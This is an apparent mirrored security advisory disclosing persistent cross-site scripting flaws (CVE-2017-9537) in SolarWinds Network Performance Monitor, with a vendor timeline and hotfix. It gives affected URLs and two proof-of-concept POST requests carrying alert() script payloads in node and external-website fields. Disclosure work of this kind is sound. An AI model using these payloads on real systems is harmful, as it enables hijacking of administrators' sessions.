SolarWinds Network Performance Monitor 12.0.15300.90 Cross Site Scripting Vulnerability

🗓️ 30 Sep 2017 00:00:00Reported by Andy TanType

zdt🔗 0day.today👁 45 Views

SolarWinds Network Performance Monitor 12.0.15300.90 Persistent Cross-Site Scripting Vulnerabilit

Reporter	Title	Published	Views	Family All 9
CNVD	SolarWinds Network Performance Monitor Cross-Site Scripting Vulnerability	1 Nov 201700:00	–	cnvd
CVE	CVE-2017-9537	2 Oct 201714:00	–	cve
Cvelist	CVE-2017-9537	2 Oct 201714:00	–	cvelist
EUVD	EUVD-2017-18468	7 Oct 202500:30	–	euvd
NVD	CVE-2017-9537	3 Oct 201701:29	–	nvd
OpenVAS	SolarWinds Orion NPM 12.0.15300.90 Multiple Vulnerabilities	21 Nov 201700:00	–	openvas
OSV	CVE-2017-9537	3 Oct 201701:29	–	osv
Packet Storm	SolarWinds Network Performance Monitor 12.0.15300.90 Cross Site Scripting	29 Sep 201700:00	–	packetstorm
Prion	Cross site scripting	3 Oct 201701:29	–	prion

-------------------------------------------------------------
Vulnerability type: Persistent Cross-Site Scripting
-------------------------------------------------------------
Credit: Andy Tan
CVE ID: CVE-2017-9537
-----------------------------------------------
Product: SolarWinds Network Performance Monitor
-----------------------------------------------
Affected version: SolarWinds Network Performance Monitor version 12.0.15300.90 and possibly earlier
Hotfix: SolarWinds Orion Platform 2017.3 Hotfix 1

1.
Affected URL: https://<ip>/Orion/Nodes/Add/Properties.aspx
Affected parameter: City, Comments, Department
Affected functions: Group Description field, Last_XX_Events resource, Events page, and error page
Navigation: (Settings -> Manage Nodes -> Add Node)

2.
Affected Source URL: https://<ip>/Orion/Services/WebAdmin.asmx/CreateExternalWebsite
Affected parameter: FullTitle
Affected URL: https://<ip>/Orion/External.aspx?Site=<no>
Navigation: (Settings -> All Settings -> External Websites)


================
Proof of Concept
================
1.
POST /Orion/Nodes/Add/Properties.aspx HTTP/1.1

<Fill up rest of the headers>


<Fill up rest of the parameters>ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl00%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSCity')%3E&ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl01%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSComments')%3E&ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl02%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSDept')%3E

2.
POST /Orion/Services/WebAdmin.asmx/CreateExternalWebsite HTTP/1.1

<Fill up rest of the headers>



{"site":{"ID":0,"ShortTitle":"title","FullTitle":"</title><script>alert('DTPTXSS!')</script>","URL":"url"},"menuBar":"Default"}

------------------------
Vendor contact timeline:
------------------------
2017-06-12: Contacted vendor.
2017-06-23: Vendor responded that bug jury completed and vulnerability is assigned to vNext milestone.
2017-08-22: Contacted vendor again.
2017-08-23: Vendor responded that hotfix will be released for all products shipping on Orion Core 2017.3
2017-09-28: Contacted vendor again.
2017-09-28: Vendor responded that the vulnerability is addressed in the recently released Hotfix for Core 2017.3
2017-09-29: Public disclosure.

#  0day.today [2018-03-02]  #

30 Sep 2017 00:00Current

5.7Medium risk

Vulners AI Score5.7

EPSS0.01302